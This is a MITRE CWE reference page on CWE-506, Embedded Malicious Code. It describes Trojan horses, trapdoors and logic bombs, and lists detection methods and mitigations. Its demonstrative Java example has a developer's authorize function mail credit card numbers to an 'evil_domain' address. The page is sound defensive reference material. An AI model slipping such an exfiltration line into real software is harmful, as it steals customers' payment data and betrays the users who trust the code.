CWE

Common Weakness Enumeration

A Community-Developed Dictionary of Software Weakness Types

Common Weakness Scoring System
Common Weakness Risk Analysis Framework
Home > CWE List > CWE- Individual Dictionary Definition (2.8)  

Presentation Filter:

CWE-506: Embedded Malicious Code

 
Embedded Malicious Code
Weakness ID: 506 (Weakness Class)Status: Incomplete
+ Description

Description Summary

The application contains code that appears to be malicious in nature.

Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

+ Terminology Notes

The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20].

+ Time of Introduction
  • Implementation
+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Availability

Technical Impact: Execute unauthorized code or commands

+ Detection Methods

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

  • Generated Code Inspection

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Automated Monitored Execution

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Origin Analysis

Effectiveness: SOAR Partial

+ Demonstrative Examples

Example 1

In the example below, a malicous developer has injected code to send credit card numbers to his email address.

(Bad Code)
Example Language: Java 
boolean authorizeCard(String ccn) {
// Authorize credit card.
...

mailCardNumber(ccn, "evil_developer@evil_domain.com");
}
+ Potential Mitigations

Phase: Testing

Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory505Intentionally Introduced Weakness
Development Concepts (primary)699
ChildOfCategoryCategory904SFP Primary Cluster: Malware
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfWeakness ClassWeakness Class912Hidden Functionality
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base507Trojan Horse
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base510Trapdoor
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base511Logic/Time Bomb
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base512Spyware
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
LandwehrMalicious
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
LandwehrExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Description, Relationships, Other_Notes, Taxonomy_Mappings
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2010-09-27CWE Content TeamMITREInternal
updated Other_Notes, Terminology_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors
Previous Entry Names
Change DatePrevious Entry Name
2008-01-30Malicious
Page Last Updated: July 30, 2014